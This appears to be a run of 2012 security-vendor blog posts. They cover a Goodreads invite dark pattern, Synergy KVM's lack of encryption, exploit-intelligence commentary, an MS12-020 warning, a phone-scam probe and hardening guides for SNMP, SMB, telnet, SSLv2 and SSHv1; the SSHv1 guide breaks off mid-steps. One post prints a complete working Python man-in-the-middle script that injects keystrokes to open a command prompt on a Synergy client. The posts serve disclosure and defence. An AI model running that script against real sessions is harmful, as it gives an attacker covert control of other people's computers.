If you’re a user of Goodreads, you really need to be warned about the shady social engineering tactics the site uses to gain access to your own personal contact lists to spam people with invites to the site.  One would think that only less well-known sites would engage in social network anti-patterns, and yet here I am wondering how a site as popular as Goodreads, with over 7,700,000 members, is getting away with this. 

Goodreads tricks users into thinking that they can search their contact lists of other popular sites such as Facebook, Gmail, Yahoo Mail, Hotmail, and Twitter to find people they know who are already members of Goodreads.  The site allows you to search those contact lists, mark which contacts you want to invite to be your friend on Goodreads, and then send them the friend invite.  The problem is that the friends in those contact lists may not actually be members of Goodreads, even though Goodreads tells you specifically that they are.  Instead of sending your contacts a simple Goodreads friend invite, they’re sent an invitation to Goodreads.  As per Wikipedia, “Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.”  This definition very clearly defines exactly what Goodreads is doing to its users, and they’ve been doing it for a long time.

Getting tricked into spamming your contacts with Goodreads invites isn’t hard.  The first thing you’ll notice in the “add friends” section of Goodreads is the text “Find friends in your address book who are on Goodreads.”  Wondering who of my Facebook friends were members of Goodreads, I clicked the big blue facebook button.  I was immediately presented with the screen below.

I was very surprised at the number of my Facebook friends that the site claimed to be members of Goodreads.  At this point I probably should have stopped and thought about what was really going on here, but I believed Goodreads to be a fairly reputable site, so I continued.  Thankfully I didn’t hit the “Add All” button, but went with the more conservative approach and manually selected 50 or so people from a couple of the lists.  Goodreads then popped up a warning dialog prompting me if I really wanted to send the Goodreads request.  I had assumed that Goodreads had some integration with Facebook that would invite my Facebook Goodreads friends to be my Goodreads friends, and so I clicked send request.

Not soon after sending the requests, I began getting messages from some friends and family that I had inadvertently “spammed”, asking me what Goodreads was and whether or not my Facebook account had become compromised.  I was at a loss for words, the site had clearly said that I was searching for friends who were already members of Goodreads, and yet I had just inadvertently sent Goodread invitations to about 50 people in my friends list.

You may be thinking that this is surely an innocent mistake on Goodreads’ part.  I did some searching, and I found a post that  Micki Krimmell made over four years ago complaining that Goodreads tricked her into spamming her entire address book as well.  Goodreads responded to Micki, sincerely apologizing for the misunderstanding.  They claimed they try to make their address book importer as clear as possible, and that they were even going to make improvements to the process to make it clearer as to what the user is actually doing when they’re inviting friends.  This was four years ago.  It looks like they have since changed the text “Are your friends already on goodreads?” to “Find friends in your address book who are already on Goodreads.”  The new text is even more misleading than the text from four years ago!  In their defense, from what I can gather it seems as though the Facebook send invite confirmation window may have been added since Micki’s post, but the whole process is still very obviously misleading. 

Since Goodreads seems to have already been made aware of exactly what it’s doing four years ago and the process is just as misleading as ever, I guess the best we can do at this point is complain loudly and hope for the best.  They lost my trust as a customer, but hey at least they gained a few new members out of my own personal contacts right?

As promised in my previous post where I discussed the inherent insecurity of the Synergy VKVM, today I’ll be presenting a Python script I wrote which acts as a man-in-the-middle (or MITM) between a Synergy server and client to demonstrate just how vulnerable Synergy is to a MITM attack.  What’s a MITM attack you ask?  Well citizen, that’s an excellent question and I thank you for it.  I think it’s great that we live in a world where we can ask questions.  Without questions, we just have answers, and an answer without a question is a statement.  </mayor_west>  Alright, a MITM attack involves a malicious eavesdropper which sits between two victims and proxies packets or messages between them, typically without their knowledge.  Not all MITM attacks are the same, and it isn’t always possible for a MITM to read the messages it’s relaying between two victims.  In the case of Synergy, a MITM can inspect all traffic sent between the victims due to a complete lack of encryption.  As discussed in my previous post about the TLS Legacy Session Renegotiation vulnerability, even though a MITM may not be able to read the encrypted traffic it’s relaying, it may still be possible to obtain confidential information or make one of the victims behave unexpectedly.  How do you become a MITM?  Another excellent question!  Usually becoming a MITM isn’t very easy and involves some type of ARP Cache Poisoning, but that’s a whole other blog post in and of itself.

Now, let’s dig into synergy_mitm.py.  Below is synergy_mitm.py in its entirety.

# Copyright (C) 2012 Chris Pawlukowsky (cpawlukowsky@ncircle.com)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#
# The purpose of this script is to demonstrate how easy it is to perform a
# man-in-the-middle attack against a Synergy Server and Client in order to execute
# key presses and mouse movements on the victim client machine.

import asyncore
import socket
import sys
import time
from collections import deque

class SynergyClient(asyncore.dispatcher_with_send):
    def __init__(self, sock, server):
        asyncore.dispatcher_with_send.__init__(self, sock)
        self.server = server
        self.sent_payload = False

    def handle_read(self):
        """Read and handle data sent from the synergy client"""

        try:
            data = self.recv(4096)
            if self.server:
                if self.server.harbinger.controlling:
                    # No operation, continue flushing payload queue
                    if data == '\x00\x00\x00\x04\x43\x4e\x4f\x50':
                        self.server.harbinger.send_payload()
                # Pass synergy client data off to the synergy server
                else:
                    self.server.send(data)
        except socket.error:
            self.handle_close()

    def handle_close(self):
        print "Client closing."
        if self.server:
            self.server.handle_close()
        else:
            self.close()

class SynergyListener(asyncore.dispatcher_with_send):
    def __init__(self, listener_addr, server):
        asyncore.dispatcher_with_send.__init__(self)
        self.server = server
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.set_reuse_addr()
        self.bind(listener_addr)
        self.listen(1)
        print "Listening for Synergy client"

    def handle_accept(self):
        """Accept a TCP connection from a synergy client"""

        print "Connect request"
        conn, addr = self.accept()
        if not self.server.synergy_client:
            self.server.connect_to_server()
            self.server.synergy_client = SynergyClient(conn, self.server)
        else:
            conn.close()

class SynergyHarbinger():
    def __init__(self, server):
        self.server = server
        self.start_packet = '\x00\x00\x00\x0a'
        self.key_pressed = '\x44\x4b\x44\x4e'
        self.key_release = '\x44\x4b\x55\x50'
        self.server_keepalive = '\x43\x41\x4c\x56'
        self.client_keepalive = '\x43\x41\x4c\x56\x00\x00\x00\x04\x43\x4e\x4f\x50'

        self.controlling = False
        self.payload_queue = deque([])

    def control(self):
        """Begin sending crafted data to the synergy client until
        the payload queue has been emptied.  We will reply to any keepalive
        requests from the synergy server with a client keepalive response
        """

        self.controlling = True
        print "Assuming Direct Control"

    def relinquish_control(self):
        """Once again begin proxying packets between the synergy client and server"""

        self.controlling = False
        print "Relinquishing control"

    def send_open_cmd(self):
        """Loads the payload queue with synergy key press commands to open
        a command prompt on the client machine.  We could obviously just run
        any command directly from the run prompt, but we're doing this
        just for demonstration purposes.
        """

        if not self.payload_queue:
            self.control()
            self.payload_queue = deque([
                self.key_pressed + '\xef\xeb\x20\x10\x01\x5b', # windows key
                self.key_pressed + '\x00\x72\x20\x10\x00\x13', # r
                self.key_release + '\x00\x72\x20\x10\x00\x13', # release r
                self.key_release + '\xef\xeb\x20\x10\x01\x5b', # release windows key
                'wait',                                        # wait 1 second to give time for the prompt to open
                self.key_pressed + '\x00\x63\x20\x00\x00\x2e', # c
                self.key_pressed + '\x00\x6d\x20\x00\x00\x32', # m
                self.key_release + '\x00\x63\x20\x00\x00\x2e', # release c
                self.key_release + '\x00\x6d\x20\x00\x00\x32', # release m
                self.key_pressed + '\x00\x64\x20\x00\x00\x20', # d
                self.key_release + '\x00\x64\x20\x00\x00\x20', # release d
                self.key_pressed + '\xef\x0d\x20\x00\x00\x1c', # enter
                self.key_release + '\xef\x0d\x20\x00\x00\x1c', # release enter
            ])
            self.send_payload()
            self.server.synergy_client.sent_payload = True

    def packet(self, contents):
        return self.start_packet + contents

    def send_payload(self):
        """Sends the next payload in the payload queue.  If the payload is equal
        to 'wait' it will sleep 1 second and then send the next payload.
        """

        try:
            if self.controlling and self.payload_queue and self.server.synergy_client:
                print "Sending payload"
                payload = self.payload_queue.popleft()
                if payload == 'wait':
                    time.sleep(1)
                    payload = self.payload_queue.popleft()
                self.server.synergy_client.send(self.packet(payload))
                if not self.payload_queue:
                    print "Payload sequence complete."
                    self.relinquish_control()
        except socket.error:
            self.server.handle_close()

    def send_server_keepalive_response(self):
        """Sends a client keepalive response to the synergy server"""

        if self.controlling and self.server.synergy_client:
            self.server.synergy_client.send(self.packet(self.client_keepalive))

class SynergyController(asyncore.dispatcher_with_send):
    def __init__(self, synergy_server_addr, listener_addr):
        asyncore.dispatcher_with_send.__init__(self)
        self.synergy_server_addr = synergy_server_addr
        self.listener_addr = listener_addr
        self.listener = None
        self.synergy_client = None
        self.got_keepalive = False
        self.harbinger = SynergyHarbinger(self)

    def start(self):
        self.got_keepalive = False
        self.listener = SynergyListener(self.listener_addr, self)

    def handle_error(self, *n):
        self.close()

    def connect_to_server(self):
        """Connects to the synergy server"""

        print "Connecting to server"
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connect(self.synergy_server_addr)

    def handle_read(self):
        """Reads and handles data sent from the synergy server"""

        try:
            data = self.recv(4096)
            if self.synergy_client:
                # Server has sent a keepalive, handshake is complete.
                if data.endswith(self.harbinger.server_keepalive):
                    self.got_keepalive = True
                    print "Got keepalive"
                    # Start sending payload
                    if not self.harbinger.controlling and not self.synergy_client.sent_payload and self.got_keepalive:
                        print "Handshake complete.  Sending payloads."
                        self.harbinger.send_open_cmd()
                    # Send client keepalive in response to server keepalive
                    elif self.harbinger.controlling:
                        self.harbinger.send_server_keepalive_response()
                    # Forward packet off to the client
                    else:
                        self.synergy_client.send(data)
                # Just forward the packet off to the synergy client
                else:
                    self.synergy_client.send(data)
        except socket.error:
            self.handle_close()

    def handle_close(self):
        print "Closing connection."
        if self.synergy_client:
            self.synergy_client.close()
            self.synergy_client.server = None
            self.synergy_client = None
        if self.listener:
            self.listener.close()
            self.listener = None
        self.close()
        self.start()

if __name__ == '__main__':
    try:
        ssa = sys.argv[1].split(':')
        la = sys.argv[2].split(':')
    except:
        print "Usage: synergy_mitm.py synergy_server_addr:port listen_addr:port"
        exit(1)
    else:
        # localhost 24800  192.168.1.2 24801
        app = SynergyController((ssa[0], int(ssa[1])), (la[0], int(la[1])))
        app.start()
        asyncore.loop()

The script makes use of the asyncore module, an extremely handy and lightweight asynchronous socket handler built into the Python standard library.  Asyncore makes use of the select() system calls in an operating system’s I/O library to allow you to create what feels like a multi-threaded program to handle multiple communication channels at once within a single-threaded program.  If you haven’t used it before, I highly recommend playing around with it.

I’ve created the diagram below to help give a visual representation of the flow of traffic between the synergy server, synergy_mitm.py, and the synergy client. 

Using asyncore, we create a listener which (surprise) listens for and accepts TCP connections from clients.  When a client connects to us, we immediately establish our own TCP connection to the real synergy server.  When the server starts sending us data, starting with a synergy handshake packet, we pass the packets off directly to the client.  Similarly, when the client responds to the server’s requests, we relay the client’s responses back to the server.  The server thinks we’re the client, the client thinks we’re the server, and we think we’re the Harbinger.

While relaying the traffic between the server and client, we’re monitoring the packets for synergy “Keep Alive” messages.  Once we see “Keep Alive” messages, we know that the synergy negotiation has completed and that the client is now ready to receive key press commands from the server.  At this point we can assume direct control of the client, which means we stop relaying information between the client and server.  Any time the server sends a keep alive to the client, instead of passing it along like a good little proxy, we respond on the client’s behalf with a keep alive of our own.  We fill up our payload queue with a list of keypress and keyrelease commands that we’ll be sending the client.  One-by-one we’ll start flushing our payload queue, sending each keypress or keyrelease command to the client individually.  Each command incites a response from the client in the form of a “No Operation” message.  Once we receive the “No Operation” message, we’re clear to send the next packet in the payload queue.  For the purposes of this demonstration, the payload queue contains a combination of keypress and keyrelease commands which do the following:

1) Presses the windows key and then presses “r” to open the run window.  These keys are then released.

2) Waits 1 second for the run window to display

3) Types out “cmd”

4) Hits “enter” to open up a command prompt

Once we’re done sending our payloads, we can simply resume relaying traffic between the client and server.  The server has no idea that the client was issued a bunch of keypress and keyrelease commands, and the client has no idea that the server didn’t actually send it any.

Why’d I go through the trouble of writing this script?  First and foremost, I did it for fun.  I understood MITM attacks, but I’d never before had the opportunity to play around with one and I figured this would be a great opportunity to do so.  Second, I wanted to provide a good real-life example of how a MITM attack worked.  Anyone can pick up this script, go install Synergy for free, and play around with it.  Third, I really wanted to drill home how important it is to follow Synergy’s recommendation and tunnel its traffic over SSH (or any type of SSL tunnel).   When you hear an application is vulnerable to a MITM attack, it just doesn’t sink in as much as it does when you see a working exploit.  Who knows, maybe someone can do something fun with this script.  Who doesn’t love programmatic ways of controlling remote systems?

“Synergy” is one of the many tools I’ve added to my repertoire since joining nCircle back in 2007.  It’s a virtual KVM allowing you to seamlessly control multiple computers across differing operating systems through a single keyboard and mouse.  The tool is quite popular, and it is indeed a great way to improve your productivity at no monetary cost.  Unfortunately, I’ve since realized that Synergy is extremely insecure.  It’s so insecure, that security doesn’t seem to have been a concern during its design at all.  The kicker?  I’ve found that most Synergy users have no idea just how much risk they’re inadvertently taking by using it.  I’m not here to tell anyone to stop using Synergy, as I haven’t stopped using it myself.  I am however, a firm believer that if you’re going to take risks, you should at least be informed as to what they are so that you can take the appropriate precautions.

Before I continue, I’m just going to go right out and tell you the top two big Synergy security concerns.

1)      Synergy does not encrypt any of its traffic.  All of your keyboard presses, mouse movements, and clipboard contents go out on the wire in the clear.

2)      Synergy does not perform any authentication.  It is extremely vulnerable to man-in-the-middle attacks (as I’ll demonstrate in my next post).

Whoa, hold on a sec.  This means if you’ve been using Synergy in a default configuration, you’ve essentially installed a keylogger on your system that’s sending everything you do out across your network.  If you use Synergy and you didn’t know this, you’re probably doing a lot of thinking right about now.  “Did I log into my banking site?”, “Did I log into a production server?”, “Has someone pwned my computer without my knowledge?”, “How much do I really trust my local network?”, “Why didn’t I know about these risks?”.  I think that last question is really something worth answering.  You may be thinking that you didn’t know about the risks because you weren’t paying attention during install or setup.  You would be wrong.  The problem is that Synergy doesn’t do an adequate job of warning its users.  Sure, if you go onto their site and look at their FAQ they make these risks pretty clear, but who looks at every FAQ before installing and using software?  Synergy should be prompting you with a huge warning dialog explaining what risks you’re taking before you can even start the Synergy server.  I get a big warning when I start the stable 64-bit version of Synergy informing me that I’m running experimental software, but no warning about missing encryption and authentication?  The only reason I’m even aware of these flaws is because I just so happened to take a peek at my Synergy traffic as I was looking through some packet captures and noticed that I could see all of my key presses going out across the wire in the clear.  This immediately prompted me to do some more thorough browsing of the Synergy site.

It turns out that the recommended secure configuration is to use SSH port forwarding (or some other type of SSL tunneling) to tunnel your Synergy traffic through a layer of encryption.  You can easily find instructions for doing this with a quick Google search, but it’s work that most users won’t even know they need to do.  An issue has actually been open in Synergy’s issue tracker from back in February of 2009 by aidin.fanni to add native support for encryption of Synergy traffic, unfortunately as of this post the issue remains open with a status of “PatchesWelcome”.  You can find the issue here.  I’m extremely grateful to all the hard work that’s been put into this awesome software, but I get a sour taste in my mouth when I’m not properly warned about risks I’m exposed to.

I went ahead and added application detection for “Synergy Server” to nCircle’s ASPL with application ID 13106, along with a “Synergy Server Available” vulnerability with ID 45210.  nCircle IP360 and PureCloud users can look forward to soon being able to scan their networks to detect anything running an insecure Synergy Server setup.

So if you’re going to use Synergy, be sure to tunnel it over SSH as per Synergy’s recommendation.  A lesson we can take away from all of this is to be sure to do your research on the tools you use before using them.  Many people take their security for granted nowadays, but doing that could be very costly to you, your company, or anyone entrusting their data to you. 

For part 2, I’ll be providing the source to, and describing, a python script I wrote that acts as a man-in-the-middle between a Synergy server and client.  The script is able to assume control of the session at will and inject key presses to open up a command prompt on a machine running the Synergy client.  Be sure to check it out when it’s available.

I was recently sent a link to a video of Dan Guido presenting a research project entitled, ‘The Exploit Intelligence Project’.  Given my role with nCircle, I found the presentation incredibly interesting and found myself a little jealous of some of the raw data he had access to. That being said, I also found most of the conclusions a little shortsighted and disappointing. 

Dan gives great advice for multilayered defense that greatly reduces the importance of quickly patching important products; it’s advice I plan to apply to my wife’s laptop as soon as possible. The problem is that it requires a utopian network with a completely obedient user base. Things like installing Google Chrome Frame and forcing everyone through a proxy that forces the ‘X-UA-Compatible’ header are great, but what about laptops or people with admin rights to their local system?

If we back up and talk about the presentation though, the discussion around important vulnerabilities is where I started to realize how the presentation was not applicable for the enterprise. According to the presentation, the number of vulnerabilities you had to pay attention to in 2010 was 13. How about all the way back in 2006?  Just 75.

This effectively tells people that only a handful of products matter, and from where I sit this is just bad practice. It leads people to believe they can successfully secure their network by focusing on only those few items and that’s both misleading and irresponsible.

This may be because when this advice/data is presented, the viewer hasn’t been introduced to the idea that the intelligence project isn’t looking at the big picture, but rather a much smaller image that only deals with mass malware infections.

My favourite slide, by far, was Maslow’s Internet Threat Hierarchy which showed ‘# of Attacks’ vs ‘Data Lost’. While mass malware represented the largest portion of attacks; it also represented the smallest amount of data lost. I didn’t feel this point was properly addressed, since higher data loss can be significantly more costly to a company.

The most interesting part of the presentation was the revelation that mass malware infections generally use 0-day vulnerabilities that have been dropped on mailing lists like Full Disclosure and seldom make use of vendor-released advisories. This means that ultimately the ‘Full Disclosure’ conversation could be considered to have a winning and losing side, with ‘Full Disclosure’ losing over ‘Responsible Disclosure’.  So the next time you say, “Oh man, Researcher X has stuck it to Vendor Y by dropping that!” realize that they’ve actually stuck it to millions of end users who will now face an additional malware attack vector.

This was by far the most interesting revelation of the presentation, unfortunately this fact that was mostly glossed over without much analysis or commentary.

In the end, the presentation had a lot of good points, including reinforcing the method of scoring that we use here at nCircle, which scores risk by looking at the availability of exploit code and how that exploit code is being used.

The presentation also contains a number of “not so good” points, and these are what I really wanted to talk about. So watch the presentation, learn from it and enjoy it but keep a few things in mind:

-       Mass Malware infections are not the only threat enterprises face, and they need to be aware of the other threats out there.

-       Focusing your efforts only mitigating the vulnerabilities exploited by malware is fine for home users, but could leave a glaring hole in enterprise defenses where other threats are concerned.

-       It’s true that too many vulnerabilities are over-hyped but I think that this presentation downplays the seriousness of many issues.

-       Apply your patches everywhere, don’t focus on a subset of issues because of some historical data; hindsight is always 20/20. 

There’s an article over on NetworkWorld about a new type of ‘fileless’ malware that I was reading this afternoon. The article opened with flashy words like ‘rare’ and ‘unique’ so I was expecting a malware unicorn, a mythical, beautiful piece of code, the likes of which the world has never encountered before. Instead, I read about a horse with a carrot taped to its forehead.

The article discusses a ‘drive-by-download’ that doesn’t download anything. This is not new. It may be the first time that malware companies have seen this, but exploit frameworks have employed this technique for years. In fact, I’ve questioned the term ‘drive-by-download’ for a very long time. It doesn’t make sense, since it’s common to see a browser attack that doesn’t write to the disk.

This article employs many of the scare tactics we see the evening news using to advertise upcoming segments.

In the same way he evening news runs tag lines like, ‘Hostage Situation at Mid-Town Bank, find out who died and who survived at 11’, this article is full of FUD. Lines like ‘This use of Java makes this a multi-platform attack’ elicit the samereaction as the reporter, who comes on screen at 11 to say, ‘And no one died.’ This article even closes with the sentence, ‘but only Windows is targeted.’

Lines like ‘If the exploit being targeted is unpatched then security programs will not pick it up easily.’ read like the lines you expect from a shady mechanic, exploiting your lack of automotive understanding. It’s not what you’d expect in a legitimate news report.

I guess the ultimate question is, who’s to blame? The journalist: for writing an article when no content exists? The vendor: for calling an old technique new? The malware author: for lacking the creativity to come up with something new?

Personally, I blame readers; they continue to believe the media hype and don’t bother to become educated. As long as hype draws readers, we’re going to see sensationalist security reporting continue.

Have you patched for Microsoft RDP - MS12-020?  No? It came out a whole three days ago, what is the hold up? 

Actually, we all know that 3 days is not a lot of time to roll out an enterprise patch but now you need to get serious.

Luigi Auriemma discovered this vulnerability in May of 2011. He reported the vulnerability to Microsoft through ZDI and Microsoft patched the vulnerability on March 13, 2012. Today Luigi released his original research and Proof of Concept (POC)code, and that’s not entirely unexpected.

This morning there are multiple reports of proof-of-concept code being used in the wild. The POC currently does not contain a malicious payload, but there will be malicious payloads over the weekend and worms within the next fewweeks.

If you are not patched now and can’t get patched ASAP then take some mitigating actions. RDP is not enabled by default but I  know many developers use RDP to access development machines or (gulp!) bypass IT regulations and access  corporate network machines from home. 

At a minimum you can block RDP at your firewalls and with IPS appliances.This will help but you really need to PATCH Your S#!T

Seriously, Patch Now or Pay Later. Your choice.

Sometimes I find myself completely in awe of the approaches used by scammers, I just don't understand how people fall for them. This morning a colleague received a text message stating 'Hudson Bay Alert' and providing a number to call (917-460-0123). Intrigued, I gave the number a call and was informed me that my credit card had been deactivated and I would need to provide information in order to reactivate the card. I hung up but was curious to find out what the scam asked for. 

The first thing that stood out to me was that the software that answered reminded me of what I've always known as the PowWow Robot Voice. Anyone that used the Tribal Voice PowWow Text-to-Speech option knows what I'm talking about. So I decided to call back and see what data the scammers wanted. 

I was greeted by the same message, in the same robot voice, telling me that my credit card had been deactivated and to enter my credit card number for confirmation. I went with the classic number, 1111 1111 1111 1111, but the software was smart enough to realize that the value wasn't valid. Amusingly though, a recorded human voice read back "my" card number. A quick Google search revealed the valid starting digits for a MasterCard (51-55) and I was back in business, entering 16 digits starting with '54'. The system accepted my number, asked me to verify the recited number, and then prompted me for my expiry date. I entered a random date (1215) and was again asked for verification. The final prompt from the robot voice was the one that stunned me, it asked me to provide my PIN associated with the account. I provided "my" uber-safe, ultra-secure PIN... 1234 and was told to 'hold for a moment'.

After my "moment" had passed, I was informed that my card had been reactivated and that I could now hang-up. I was shocked that people fall for scams that are this blatantly obvious. It was, however, a great example of why user awareness is king. Even though computers weren't involved, it also identifies how important on-going security awareness programs, tied with proactive security policies, are. As long as scams as juvenile as this work, phishing attacks will also work and that means we need to work smarter in defeating the scammers because they'll always be willing to work harder, although this proves they really don't need to.

SNMP, Simple Network Management Protocol, when not properly secured can make it simple for attackers to obtain useful information about devices on your network, and possibly even reconfigure them. SNMP can run on anything from routers and switches to servers and printers, and is often enabled by default with default community strings: 'public' for read access and 'private' for write/management access. The community string acts as the password for SNMP communication, so it is important to set complex and hard to guess community strings.

nCircle IP360 and PureCloud customers can look for various 'Weak SNMP Community String 'COMMUNITYSTRINGNAME' Found' vulnerabilities. This will identify many common and easily guessed community strings beyond just 'public' and 'private'.

Confirming SNMP public community string:

The command line tool snmpget provides a quick and easy way to check for community strings on devices running SNMP:

  snmpget -v1 -c public host sysDescr.0

Ex:

[root@dhcp-218-195 ~]# snmpget -v1 -c public 192.168.218.70 sysDescr.0
SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(20)EA1a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2004 by cisco Systems, Inc.
Compiled Mon 19-Apr-04 20:58 by yenanh

If the community string doesn't exist you will instead get:

[root@dhcp-218-195 ~]# snmpget -v 1 -c private 192.168.218.195 sysDescr.0
Timeout: No Response from 192.168.218.195.

Changing Community Strings:

As SNMP can run on a variety of systems, it may be necessary to consult the product documentation to configure or disable SNMP. If SNMP is not necessary it should be disabled whenever possible. If it is necessary, SNMP v3 should be used whenever possible.

On Windows:

  1) In the Start Menu click Run and type, or type in the search box: services.msc
  2) Locate the SNMP Service
  3) Right click on SNMP Service and click Properties
  4) Go to the Security tab and check the list of Accepted community names
  5) Remove any public, private or other easily guessed community strings and replace with complex community strings

On Linux:

  1) open snmpd.conf in a line editor, usually /etc/snmp/snmpd.conf
  2) look for lines such as:

com2sec notConfigUser  default       public

  3) Comment out any lines containing public, private or other easily guessed community strings or replace with complex community strings

Today we are going to talk a bit about SMB shares.  Shares are often enabled with little to no security protecting them, allowing them to be accessed by unprivileged users. 

nCircle IP360 and PureCloud customers can ascertain the status of their shares by looking for the following vulnerabilities in their scan report:

1)   An SMB share permits anonymous read access

2)   An SMB share permits anonymous write access

3)   An SMB share permits anonymous full control access.

4)   The Guest account has permission to read from an SMB share

5)   The Guest account has permission to write data to an SMB share

Confirming The Status Of Your Shares

The permissions on your shares can be determined using smbclient.  For example, let’s assume that you have a share named ‘Share’, and attempt to connect to it using smbclient.

# smbclient \\\\192.168.xxx.xxx\Share -U Guest%
Domain=[2K3SRVRD86] OS=[Windows Server 2003 Service Pack 2]
Server=[Windows Server 2003 5.2]
Smb: \>

As demonstrated above, we gained access to the share using username ‘Guest’ with a blank password.   You can now execute commands in order to test the level of access you have to the share.

You can modify the permissions on an SMB share to restrict access to certain users, as well as restricting the level of access each has (ie. Read, write, or full control).

Windows 2003 and earlier

1) Right-click on your share and select ‘properties’ from the context menu.
2) Select the ‘sharing’ tab from the resulting dialog.
3) Click the ‘Permissions’ button.
4) Use the ‘Add’ and ‘Remove’ buttons to specify the privileged users.
5) Select the appropriate Allow/Deny checkboxes for each user or user group.

Windows 7/2008/Vista

1) Right-click on your share and select ‘properties’ from the context menu.
2) Select the ‘Sharing’ tab.
3) Click on the ‘Share’ button.
4) Add the desired users to the list by selecting then from the drop-down and clicking ‘Add’.
5) Use the permission level drop-down beside each user to select permission level.

Not only will I tell you how to Turn That S#!T Off but today, for one day only (or, since this is the internet, forever), I will also demonstrate my psychic abilities. When you first read the title, you instantly questioned why we are discussing telnet in 2012. Short answer: it’s still out there. Slightly longer answer: people run older operating systems, systems that still shipped with telnet enabled by default.

nCircle IP360 and PureCloud customers can detect the presence of telnet on a system by watching for the “Telnet Available” vulnerability in reports.

Confirming Telnet

Telnet can be easily confirmed using the telnet command on most major operating systems. The command is simply ‘telnet <host>’ and you can see if you connect. Using ncat in this situation will lead to unexpected data:

neogeo:Downloads treguly$ ncat aix53 23
??%??

 

ncat has the –t option which will allow it to negotiate telnet options (represented as ??%?? above). The output at this point will appear closer to that of telnet but with the ? and % characters still visible.

You can confirm telnet locally, on RHEL5, using ‘chkconfig --list’ to find the line that reads ‘telnet: on’

Disabling Telnet

First, let’s add the caveat that you should only disable telnet if you have another way of accessing the system. The goal here is not to render your systems inaccessible.

RHEL5 Telnet

1) Browse to /etc/xinet.d and locate the telnet file.
2) Update the line ‘disabled = no’ to read ‘disabled = yes’.
3) Restart xinetd (/etc/rc.d/xinetd restart).

AIX 6 Telnet

1) Browse to /etc and locate the inetd.conf file.
2) Update the line that starts with ‘telnet stream’ to read ‘#telnet stream’.
3) Restart inetd (refresh -s inetd)

Stay tuned this week for additional Turn Your S#!T Off posts and remember to submit suggestions for a post or two.

Turn That S#!T Off - SSLv2 Another day, another protocol that needs to be turned off. This time we're looking at SSLv2, that wonderful protocol that even the PCI Security Standards Council has deemed unfit for human consumption. It's surprising to hear, but this insecure protocol is still in use. So let's take a minute and quickly discuss how you can turn that S#!T off.

nCircle IP360 and PureCloud customers will see SSLv2 reported as "SSLv2 Enabled" and should, if possible, make every effort to remedy the situation as quickly as possible. The important thing to keep in mind here is that HTTP isn't the only protocol tunneled over SSL; people often forget about IMAP, POP3 and SMTP (as just a few other examples).

Confirming SSLv2

SSLv2 can be easily confirmed using OpenSSL (specifically openssl s_client) which is available for most modern operating systems.

neogeo:~ treguly$ openssl s_client -ssl2 -connect northstar.test.toronto.ncircle.com:443
CONNECTED(00000003)
140735140051388:error:1407F0E5:SSL routines:SSL2_WRITE:ssl handshake failure:s2_pkt.c:430:

The above message indicates that you were unable to connect to the server using SSLv2. A successful connection would have returned the certificate, information about the SSL session, and a prompt where you could enter data to send.

Disabling SSLv2

There are plenty of servers with various configuration options, so you're best resource will be the documentation for your product. As with SSHv1, for some appliances you may have to contact the vendor for assistance. I'm going to discuss the most popular two options for SSL tunneled traffic, Apache httpd and Microsoft IIS.

Apache httpd

1) Locate the SSLProtocol line (likely: /etc/apache2/mods-available/ssl.conf)
2) Update the line to read one of the following ways:

    SSLProtocol ALL -SSLv2
    SSLProtocol -ALL +SSLv3 +TLSv1

3) Restart Apache (likely: /etc/init.d/apache2 restart)

Microsoft IIS

1) Open RegEdit and browse to:
    HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server
2) Right Click and create a new DWORD Value named Enabled
3) Ensure the value is set to 0x00000000 (0)
4) Restart IIS

A few simple steps and, once again, another headache is gone. In the end this is just a drop in the bucket on your way to achieving a more secure infrastructure, but every drop counts. Next week we'll take a look at few more items that rank high on my "turn that S#!T off" list. If you have any requests, please feel free to let us know and we'll take a look and tell you how to turn your SH#!T off.

When I first joined VERT, I had little insight into enterprise networks. I'd spent several years in a helpdesk role at a college and then worked as a sys admin for an SMB. While I still don't work directly with enterprise networks, I do get to see reports that customers submit and findings that they question. It's often a surprise for me, and for the customer, to see what is running on their network. 

In recent years the attack focus has shifted to the client, with the browser and the office suite surpassing the telnet daemon and web server as the most attractive targets on a network. In my opinion, this means that certain network-based issues are often overlooked and I wanted to highlight my list of "WTF Issues" that security teams should resolve as quickly as possible. So enough with the intro, on to the first post in VERT's new "Turn That S#!T Off" Series.

SSHv1 Enabled

SSHv1 has had known serious issues for quite a while and the common message from the security community has always been, "Turn that S#!T off". If I had a wishlist of things I'd like to see disappear on a network, this would be near the top. nCircle's IP360 and PureCloud platforms will identify this as "SSHv1 Protocol Available"

Confirming SSHv1 Support
Customers are often surprised by this one because vendors tell them that SSHv1 isn't supported but IP360 tells them it is. You can easily confirm this yourself with ncat (part of nmap):

neogeo:~ treguly$ ncat wopr.test.toronto.ncircle.com 22
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7
^C

The above server will only support SSHv2 and the first 5 characters will tell you:

SSH-2.0 - Only SSHv2 is supported.
SSH-1.99 - SSHv2 and SSHv1 are both supported.
SSH-1.5 - Only SSHv1 is supported.

Note that the first 5 characters will always be SSH-1 when SSHv1 is supported. 

Disabling SSHv1
Assuming you're running OpenSSH, disabling SSHv1 is very simple:

1) Edit your sshd_config file (generally in /etc or /etc/ssh).
